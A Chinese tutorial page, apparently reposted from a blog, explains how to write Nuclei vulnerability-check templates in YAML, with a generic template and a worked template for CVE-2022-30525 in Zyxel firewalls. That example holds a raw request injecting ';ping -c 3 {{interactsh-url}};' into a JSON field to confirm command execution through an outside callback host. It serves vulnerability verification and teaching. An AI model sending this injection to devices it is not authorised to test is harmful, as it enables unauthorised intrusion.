当前位置: 首页> 教育> 锐评 > nuclei poc编写

nuclei poc编写

时间:2025/7/14 9:44:11来源:https://blog.csdn.net/weixin_45790890/article/details/142148578 浏览次数:0次

yaml是什么?

是一个可读性高,用来表达数据序列化的格式。

切记

YAML不允许使用制表符

元素部分之间必须有空间

YAML区分大小写

YAML文档标准后缀名是: 1、.yaml 2、.yml

yaml模板内容参数解读如下:

id: 定义了该漏洞验证请求的唯一标识符。info: 定义了漏洞验证请求的相关信息。name: 指定了漏洞验证请求的名称。 author: 指定了该漏洞验证请求的作者。severity: high: 指定了该漏洞验证请求的严重程度。 description: 提供描述信息。requests: 定义了一个请求列表,包含了漏洞验证请求。raw: 定义了一个原始请求(HTTP请求)。matchers-condition: and: 定义了匹配条件的逻辑关系,表示所有匹配条件都必须满足。matchers: 定义了一组匹配条件,用于验证漏洞存在性。 type: word: 指定了匹配条件的类型为关键词匹配。part: header: 指定了关键词匹配的范围是HTTP头部。words: 指定了需要匹配的关键词。type: status: 指定了匹配条件的类型为状态码。status: 指定了需要匹配的HTTP响应状态码,表示需要匹配HTTP响应状态码是否为200。

 yaml POC模板 

id: Vulnerability template
​
info:name: Vulnerability templateauthor: I9niteseverity: highdescription:描述信息
requests:- raw: GETmatchers-condition: andmatchers:- type: wordpart: headerwords:- 'There are loopholes'- type: statusstatus:- 200

案例

id: CVE-2022-30525info:name: Zyxel 防火墙远程命令注入漏洞author: xiaodisecseverity: highdescription: 该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。reference:- https://blog.csdn.net/weixin_43080961/article/details/124776553tags: zyxel,cve,rcehttp:- raw:- |POST /ztp/cgi-bin/handler HTTP/1.1Host: {{Hostname}}Content-Type: application/json{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"{{exploit}}","data":"hi"}payloads:exploit:- ";ping -c 3 {{interactsh-url}};"matchers:- type: wordpart: interactsh_protocolname: dnswords:- "dns"

关键字:nuclei poc编写

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: